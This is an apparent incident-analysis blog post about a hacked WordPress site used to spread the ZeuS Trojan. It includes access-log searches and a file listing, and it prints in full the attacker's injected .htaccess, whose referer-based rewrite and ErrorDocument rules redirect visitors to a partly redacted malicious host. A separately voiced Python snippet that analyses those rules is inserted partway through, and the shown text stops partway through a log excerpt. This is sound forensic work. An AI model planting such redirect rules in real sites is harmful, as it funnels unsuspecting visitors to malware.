Pierre-Luc Brunet's Blog

Security analyst, Developer, Server administrator, Goalie, Father

Analysis of a Hacked Wordpress Blog


I received one of those fun abuse emails this evening regarding the Wordpress site ZeStuff hosts for one of my friends. Turns out his site had been hacked into and is now being abused by criminals to infect computers with the ZeuS banking Trojan (fun times). I quickly SSH’ed into the machine to shut down the site until I had more time later that evening to figure out what happened. Now that the kids are asleep, let’s see how they got in.

The first thing I’m interested in knowing is where this started and, hopefully, who did it. Provided you keep enough access log files around, it’s a pretty easy task.

$ grep -iP "traninfo\.html" vhosts_access.log vhosts_access.log

Using this command, I was able to determine that the first request to that page was today at 9:01:37 (EDT) by 50.116.26.166. Great. Now let’s make sure that’s really our hacker.

$ grep -iP '50\.116\.26\.166' vhosts_access.log

50.116.26.166 - [24/Jul/2012:09:01:36 -0400] "GET /wp-xml.php HTTP/1.1" 200 341 37555 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
50.116.26.166 - [24/Jul/2012:09:01:36 -0400] "POST /wp-xml.php HTTP/1.0" 200 5094 38155 "-" "-"
50.116.26.166 - [24/Jul/2012:09:01:37 -0400] "GET /traninfo.html HTTP/1.1" 200 344 4190 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
50.116.26.166 - [24/Jul/2012:09:04:29 -0400] "GET /wp-xml.php HTTP/1.1" 200 341 38210 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
50.116.26.166 - [24/Jul/2012:09:04:30 -0400] "POST /wp-xml.php HTTP/1.0" 200 5094 38155 "-" "-"
50.116.26.166 - [24/Jul/2012:09:04:30 -0400] "GET /traninfo.html HTTP/1.1" 200 344 4190 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"

Yep. That’s odd enough for me. Let’s see what’s in /traninfo.html anyway.

$ cat traninfo.html
cat: traninfo.html: No such file or directory

Awesome. Let’s see if anything was changed.

$ ls -l
total 4148
-rw-r--r-- 1 2017 2017     130 2009-12-26 00:00 400.shtml
-rw-r--r-- 1 2017 2017     162 2009-12-26 00:00 401.shtml
-rw-r--r-- 1 2017 2017     201 2009-12-26 00:00 403.shtml
-rw-r--r-- 1 2017 2017     175 2009-12-26 00:00 404.shtml
-rw-r--r-- 1 2017 2017     442 2009-12-26 00:00 500.php
-rw-r--r-- 1 2017 2017      71 2009-12-26 00:00 500.shtml
-rw-r--r-- 1 2017 2017       0 2009-12-26 00:00 default.html
drwxr-xr-x 2 2017 2017    4096 2010-12-14 01:36 files
-rw-r--r-- 1 2017 2017    2661 2012-07-24 15:17 .htaccess
-rw-r--r-- 1 2017 2017     397 2011-02-10 18:16 index.php
-rw-r--r-- 1 2017 2017   15410 2011-02-10 18:16 license.txt
-rw-r--r-- 1 2017 2017    9210 2011-02-10 18:16 readme.html
-rw-r--r-- 1 2017 2017    4391 2011-02-10 18:16 wp-activate.php
drwxr-xr-x 7 2017 2017    4096 2012-07-24 15:07 wp-admin
-rw-r--r-- 1 2017 2017   40284 2011-02-10 18:16 wp-app.php
-rw-r--r-- 1 2017 2017     220 2011-02-10 18:16 wp-atom.php
-rw-r--r-- 1 2017 2017     274 2011-02-10 18:16 wp-blog-header.php
-rw-r--r-- 1 2017 2017   23305 2012-07-16 10:21 wp_c182.php
-rw-r--r-- 1 2017 2017    3926 2011-02-10 18:16 wp-comments-post.php
-rw-r--r-- 1 2017 2017     238 2011-02-10 18:16 wp-commentsrss2.php
-rw-r--r-- 1 2017 2017    2537 2011-05-23 12:20 wp-config.php
-rw-r--r-- 1 2017 2017    3173 2011-02-10 18:16 wp-config-sample.php
drwxr-xr-x 6 2017 2017    4096 2012-07-24 15:04 wp-content
-rw-r--r-- 1 2017 2017     240 2011-02-10 18:16 wp-feed.php
drwxr-xr-x 7 2017 2017    4096 2011-02-10 18:21 wp-includes
-rw-r--r-- 1 2017 2017    2002 2011-02-10 18:16 wp-links-opml.php
-rw-r--r-- 1 2017 2017    2441 2011-02-10 18:16 wp-load.php
-rw-r--r-- 1 2017 2017   26059 2011-02-10 18:16 wp-login.php
-rw-r--r-- 1 2017 2017    7774 2011-02-10 18:16 wp-mail.php
-rw-r--r-- 1 2017 2017     487 2011-02-10 18:16 wp-pass.php
-rw-r--r-- 1 2017 2017     218 2011-02-10 18:16 wp-rdf.php
-rw-r--r-- 1 2017 2017     316 2011-02-10 18:16 wp-register.php
-rw-r--r-- 1 2017 2017     220 2011-02-10 18:16 wp-rss2.php
-rw-r--r-- 1 2017 2017     218 2011-02-10 18:16 wp-rss.php
-rw-r--r-- 1 2017 2017    9177 2011-02-10 18:16 wp-settings.php
-rw-r--r-- 1 2017 2017   18695 2011-02-10 18:16 wp-signup.php
-rw-r--r-- 1 2017 2017    3702 2011-02-10 18:16 wp-trackback.php
-rw-r--r-- 1 2017 2017   95481 2011-02-10 18:16 xmlrpc.php

Why, isn’t that interesting. .htaccess was modified today.

$ cat .htaccess 

<I removed 370 blank lines with no content>
RewriteBase /
RewriteEngine on
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*gmail.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*[OR]
RewriteCond %{HTTP_REFERER} .*hotmail.*
RewriteRule ^(.*)$ http://ear*removed*ons.com/ [R=301,L]


ErrorDocument 400 http://ear*removed*ons.com/
ErrorDocument 401 http://ear*removed*ons.com/
ErrorDocument 403 http://ear*removed*ons.com/
ErrorDocument 404 http://ear*removed*ons.com/
ErrorDocument 500 http://ear*removed*ons.com/

So that explains why a lot of the pages were returning 302 in the logs, but there are a few hours of 200 responses (meaning the HTML page was there at some point). This probably means that once Spamhaus detected the hack, the hackers removed the page and left just the forwarder hidden in the .htaccess file.
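Whether a given visitor actually gets that redirect depends on how mod_rewrite combines the conditions, which is easy to misjudge by eye. The following is an added example (my code, not the author’s and not the attacker’s file) that parses the RewriteCond/RewriteRule/ErrorDocument lines of a file like the one above and evaluates a few probe Referers against it; the excerpt is a constructed shortening of the page’s file with a placeholder redirect host, it keeps the page’s flickr line exactly as written, and it uses Python’s re where Apache uses PCRE, which is equivalent for patterns this simple.

```python
import re

# Constructed shortening of the .htaccess shown above: a few of its 37 referer
# conditions, the flickr line kept exactly as on the page (no space before [OR]),
# and a placeholder redirect host instead of the real one.
HTACCESS = """\
RewriteBase /
RewriteEngine on
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*[OR]
RewriteCond %{HTTP_REFERER} .*hotmail.*
RewriteRule ^(.*)$ http://redirect-target.invalid/ [R=301,L]

ErrorDocument 403 http://redirect-target.invalid/
ErrorDocument 404 http://redirect-target.invalid/
"""
# Same file with the single missing space restored, to compare behaviour.
HTACCESS_FIXED = HTACCESS.replace(".*flickr.*[OR]", ".*flickr.* [OR]")

COND_RE = re.compile(r"^RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)(?:\s+\[([^\]]*)\])?$")
RULE_RE = re.compile(r"^RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?$")
ERRDOC_RE = re.compile(r"^ErrorDocument\s+(\d{3})\s+(https?://\S+)$")

def _flags(text):
    return {f.strip().upper() for f in text.split(",")} if text else set()

def parse_referer_rules(text):
    """Return [(and_groups, target)] for every RewriteRule guarded by HTTP_REFERER conditions.

    mod_rewrite ANDs consecutive RewriteConds; a condition flagged [OR] is instead
    chained with the one after it, so each and_group is a list of OR'ed regexes.
    [NC] makes a single condition case-insensitive. Apache splits directive arguments
    on whitespace, so a bracket glued to the pattern is part of the regex, not a flag.
    """
    rules, groups, current = [], [], []
    for raw in text.splitlines():
        line = raw.strip()
        m = COND_RE.match(line)
        if m:
            flags = _flags(m.group(2))
            current.append(re.compile(m.group(1), re.IGNORECASE if "NC" in flags else 0))
            if "OR" not in flags:            # no [OR]: this condition closes an OR chain
                groups.append(current)
                current = []
            continue
        m = RULE_RE.match(line)
        if m:
            if current:                      # dangling [OR] still forms a group
                groups.append(current)
            if groups:                       # only referer-gated rules matter here
                rules.append((groups, m.group(2)))
            groups, current = [], []
    return rules

def redirect_for_referer(rules, referer):
    """Redirect target a visitor carrying this Referer would receive, or None."""
    for groups, target in rules:
        if all(any(rx.search(referer) for rx in group) for group in groups):
            return target
    return None

def external_error_documents(text):
    """ErrorDocument directives with an absolute URL: Apache answers that error with a redirect."""
    return {int(m.group(1)): m.group(2)
            for m in map(ERRDOC_RE.match, (l.strip() for l in text.splitlines())) if m}

PROBES = {                                   # constructed Referer values
    "direct visit": "",
    "google search": "https://www.google.com/search?q=hackedsite",
    "flickr": "https://www.flickr.com/",
    "hotmail": "https://www.hotmail.com/",
}

if __name__ == "__main__":
    for label, text in (("as found", HTACCESS), ("space restored", HTACCESS_FIXED)):
        rules = parse_referer_rules(text)
        for probe, ref in PROBES.items():
            print(f"{label:15} {probe:13} -> {redirect_for_referer(rules, ref)}")
    print("error redirects:", external_error_documents(HTACCESS))
```

Because the flickr line has no space before `[OR]`, that condition carries no flag, closes the OR chain and is ANDed with the hotmail condition, so in the file as found a plain Google referer does not trigger the rule while HTACCESS_FIXED shows the one-character change under which every listed referer does. The ErrorDocument lines redirect every 403 and 404 regardless of Referer, so missing pages go to the attacker’s host even for direct visitors.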

$ grep -iP 'wp-xml\.php' vhosts_access.log
212.71.10.193 - [24/Jul/2012:08:45:28 -0400] "POST /wp-xml.php HTTP/1.0" 200 2680 375 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:08:45:28 -0400] "POST /wp-xml.php HTTP/1.0" 500 4226 267 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
50.116.26.166 - [24/Jul/2012:09:01:36 -0400] "GET /wp-xml.php HTTP/1.1" 200 341 37555 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
50.116.26.166 - [24/Jul/2012:09:01:36 -0400] "POST /wp-xml.php HTTP/1.0" 200 5094 38155 "-" "-"
50.116.26.166 - [24/Jul/2012:09:04:29 -0400] "GET /wp-xml.php HTTP/1.1" 200 341 38210 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
50.116.26.166 - [24/Jul/2012:09:04:30 -0400] "POST /wp-xml.php HTTP/1.0" 200 5094 38155 "-" "-"
212.71.10.193 - [24/Jul/2012:09:47:15 -0400] "POST /wp-xml.php HTTP/1.0" 200 2680 375 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:09:47:15 -0400] "POST /wp-xml.php HTTP/1.0" 500 4226 267 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
80.255.227.87 - [24/Jul/2012:10:06:42 -0400] "GET /wp-xml.php HTTP/1.1" 200 499 38210 "http://hackedsite.com" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
80.255.227.87 - [24/Jul/2012:10:06:42 -0400] "POST /wp-xml.php HTTP/1.0" 200 1607 38155 "http://hackedsite.com/wp-xml.php" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
80.255.227.87 - [24/Jul/2012:10:06:43 -0400] "POST /wp-xml.php HTTP/1.0" 200 676 38145 "http://hackedsite.com/wp-xml.php" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
80.255.227.87 - [24/Jul/2012:10:13:54 -0400] "GET /wp-xml.php HTTP/1.1" 200 530 38210 "http://hackedsite.com" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2"
80.255.227.87 - [24/Jul/2012:10:13:54 -0400] "POST /wp-xml.php HTTP/1.0" 200 710 38145 "http://hackedsite.com/wp-xml.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2"
80.255.227.87 - [24/Jul/2012:10:13:55 -0400] "POST /wp-xml.php HTTP/1.0" 200 12504 13621 "http://hackedsite.com/wp-xml.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2"
80.255.227.87 - [24/Jul/2012:10:13:55 -0400] "POST /wp-xml.php HTTP/1.0" 200 720 13611 "http://hackedsite.com/wp-xml.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2"
80.255.227.87 - [24/Jul/2012:10:13:55 -0400] "POST /wp-xml.php HTTP/1.0" 200 1649 13621 "http://hackedsite.com/wp-xml.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2"
80.255.227.87 - [24/Jul/2012:10:13:56 -0400] "POST /wp-xml.php HTTP/1.0" 200 720 13611 "http://hackedsite.com/wp-xml.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2"
212.71.10.193 - [24/Jul/2012:10:45:08 -0400] "POST /wp-xml.php HTTP/1.0" 200 2680 375 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:10:45:08 -0400] "POST /wp-xml.php HTTP/1.0" 500 4226 267 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:11:47:20 -0400] "POST /wp-xml.php HTTP/1.0" 200 2680 375 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:11:47:20 -0400] "POST /wp-xml.php HTTP/1.0" 500 4226 267 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:12:45:31 -0400] "POST /wp-xml.php HTTP/1.0" 200 2680 375 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:12:45:31 -0400] "POST /wp-xml.php HTTP/1.0" 500 4226 267 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:13:45:48 -0400] "POST /wp-xml.php HTTP/1.0" 200 2680 375 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:13:45:48 -0400] "POST /wp-xml.php HTTP/1.0" 500 4226 267 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
80.255.227.87 - [24/Jul/2012:14:17:50 -0400] "GET /wp-xml.php HTTP/1.1" 200 529 38210 "http://hackedsite.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9) Gecko/2008052906 Firefox/3.0"
80.255.227.87 - [24/Jul/2012:14:17:50 -0400] "POST /wp-xml.php HTTP/1.0" 200 1247 8571 "http://hackedsite.com/wp-xml.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9) Gecko/2008052906 Firefox/3.0"
80.255.227.87 - [24/Jul/2012:14:43:06 -0400] "GET /wp-xml.php HTTP/1.1" 200 530 33706 "http://hackedsite.com" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2"
80.255.227.87 - [24/Jul/2012:14:43:07 -0400] "POST /wp-xml.php HTTP/1.0" 200 737 6557 "http://hackedsite.com/wp-xml.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2"
80.255.227.87 - [24/Jul/2012:14:44:52 -0400] "POST /wp-xml.php HTTP/1.0" 302 744 507 "http://hackedsite.com/wp-xml.php" "Mozilla/5.0 (X11; U; Linux x86_64; en; rv:1.9.0.2) Gecko/2008092702 Gentoo Firefox/3.0.2"
80.255.227.87 - [24/Jul/2012:14:45:01 -0400] "POST /wp-xml.php HTTP/1.0" 302 747 507 "http://hackedsite.com/wp-xml.php" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9a1) Gecko/20061204 GranParadiso/3.0a1"
80.255.227.87 - [24/Jul/2012:14:45:04 -0400] "POST /wp-xml.php HTTP/1.0" 302 761 507 "http://hackedsite.com/wp-xml.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; Arcor 5.005; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
80.255.227.87 - [24/Jul/2012:14:45:09 -0400] "GET /wp-xml.php HTTP/1.1" 302 499 507 "http://hackedsite.com" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
212.71.10.193 - [24/Jul/2012:14:47:26 -0400] "POST /wp-xml.php HTTP/1.0" 302 2680 507 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
80.255.227.87 - [24/Jul/2012:14:51:27 -0400] "GET /wp-xml.php HTTP/1.1" 302 483 507 "http://hackedsite.com" "Opera/9.01 (X11; Linux i686; U; en)"
212.71.10.193 - [24/Jul/2012:15:44:21 -0400] "POST /wp-xml.php HTTP/1.0" 302 2680 425 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:16:36:04 -0400] "POST /wp-xml.php HTTP/1.0" 302 2680 425 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:17:25:44 -0400] "POST /wp-xml.php HTTP/1.0" 302 2680 425 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:18:13:25 -0400] "POST /wp-xml.php HTTP/1.0" 403 2680 399 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:19:03:35 -0400] "POST /wp-xml.php HTTP/1.0" 403 2680 399 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:19:54:44 -0400] "POST /wp-xml.php HTTP/1.0" 403 2680 399 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:20:44:11 -0400] "POST /wp-xml.php HTTP/1.0" 403 2680 399 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:21:34:33 -0400] "POST /wp-xml.php HTTP/1.0" 403 2680 399 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:22:25:16 -0400] "POST /wp-xml.php HTTP/1.0" 403 2680 399 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"

Lots of calls, but nothing close to 15:17, the .htaccess modification time. Let’s see all the pages those IPs loaded.

$ grep -iP '(212\.71\.10\.193|50\.116\.26\.166|212\.71\.10\.193|80\.255\.227\.87)' /var/log/apache2/vhosts_access.log
212.71.10.193 - [24/Jul/2012:08:45:28 -0400] "POST /wp-xml.php HTTP/1.0" 200 2680 375 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:08:45:28 -0400] "POST /wp-xml.php HTTP/1.0" 500 4226 267 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
50.116.26.166 - [24/Jul/2012:09:01:36 -0400] "GET /wp-xml.php HTTP/1.1" 200 341 37555 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
50.116.26.166 - [24/Jul/2012:09:01:36 -0400] "POST /wp-xml.php HTTP/1.0" 200 5094 38155 "-" "-"
50.116.26.166 - [24/Jul/2012:09:01:37 -0400] "GET /traninfo.html HTTP/1.1" 200 344 4190 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
50.116.26.166 - [24/Jul/2012:09:04:29 -0400] "GET /wp-xml.php HTTP/1.1" 200 341 38210 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
50.116.26.166 - [24/Jul/2012:09:04:30 -0400] "POST /wp-xml.php HTTP/1.0" 200 5094 38155 "-" "-"
50.116.26.166 - [24/Jul/2012:09:04:30 -0400] "GET /traninfo.html HTTP/1.1" 200 344 4190 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
212.71.10.193 - [24/Jul/2012:09:47:15 -0400] "POST /wp-xml.php HTTP/1.0" 200 2680 375 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:09:47:15 -0400] "POST /wp-xml.php HTTP/1.0" 500 4226 267 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
80.255.227.87 - [24/Jul/2012:10:06:42 -0400] "GET /wp-xml.php HTTP/1.1" 200 499 38210 "http://hackedsite.com" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
80.255.227.87 - [24/Jul/2012:10:06:42 -0400] "POST /wp-xml.php HTTP/1.0" 200 1607 38155 "http://hackedsite.com/wp-xml.php" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
80.255.227.87 - [24/Jul/2012:10:06:43 -0400] "POST /wp-xml.php HTTP/1.0" 200 676 38145 "http://hackedsite.com/wp-xml.php" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
80.255.227.87 - [24/Jul/2012:10:13:54 -0400] "GET /wp-xml.php HTTP/1.1" 200 530 38210 "http://hackedsite.com" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2"
80.255.227.87 - [24/Jul/2012:10:13:54 -0400] "POST /wp-xml.php HTTP/1.0" 200 710 38145 "http://hackedsite.com/wp-xml.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2"
80.255.227.87 - [24/Jul/2012:10:13:55 -0400] "POST /wp-xml.php HTTP/1.0" 200 12504 13621 "http://hackedsite.com/wp-xml.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2"
80.255.227.87 - [24/Jul/2012:10:13:55 -0400] "POST /wp-xml.php HTTP/1.0" 200 720 13611 "http://hackedsite.com/wp-xml.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2"
80.255.227.87 - [24/Jul/2012:10:13:55 -0400] "POST /wp-xml.php HTTP/1.0" 200 1649 13621 "http://hackedsite.com/wp-xml.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2"
80.255.227.87 - [24/Jul/2012:10:13:56 -0400] "POST /wp-xml.php HTTP/1.0" 200 720 13611 "http://hackedsite.com/wp-xml.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2"
212.71.10.193 - [24/Jul/2012:10:45:08 -0400] "POST /wp-xml.php HTTP/1.0" 200 2680 375 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:10:45:08 -0400] "POST /wp-xml.php HTTP/1.0" 500 4226 267 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:11:47:20 -0400] "POST /wp-xml.php HTTP/1.0" 200 2680 375 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:11:47:20 -0400] "POST /wp-xml.php HTTP/1.0" 500 4226 267 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:12:45:31 -0400] "POST /wp-xml.php HTTP/1.0" 200 2680 375 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:12:45:31 -0400] "POST /wp-xml.php HTTP/1.0" 500 4226 267 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:13:45:48 -0400] "POST /wp-xml.php HTTP/1.0" 200 2680 375 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
212.71.10.193 - [24/Jul/2012:13:45:48 -0400] "POST /wp-xml.php HTTP/1.0" 500 4226 267 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
80.255.227.87 - [24/Jul/2012:14:17:50 -0400] "GET /wp-xml.php HTTP/1.1" 200 529 38210 "http://hackedsite.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9) Gecko/2008052906 Firefox/3.0"
80.255.227.87 - [24/Jul/2012:14:17:50 -0400] "POST /wp-xml.php HTTP/1.0" 200 1247 8571 "http://hackedsite.com/wp-xml.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9) Gecko/2008052906 Firefox/3.0"
80.255.227.87 - [24/Jul/2012:14:43:06 -0400] "GET /wp-xml.php HTTP/1.1" 200 530 33706 "http://hackedsite.com" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2"
80.255.227.87 - [24/Jul/2012:14:43:07 -0400] "POST /wp-xml.php HTTP/1.0" 200 737 6557 "http://hackedsite.com/wp-xml.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2"
80.255.227.87 - [24/Jul/2012:14:44:52 -0400] "POST /wp-xml.php HTTP/1.0" 302 744 507 "http://hackedsite.com/wp-xml.php" "Mozilla/5.0 (X11; U; Linux x86_64; en; rv:1.9.0.2) Gecko/2008092702 Gentoo Firefox/3.0.2"
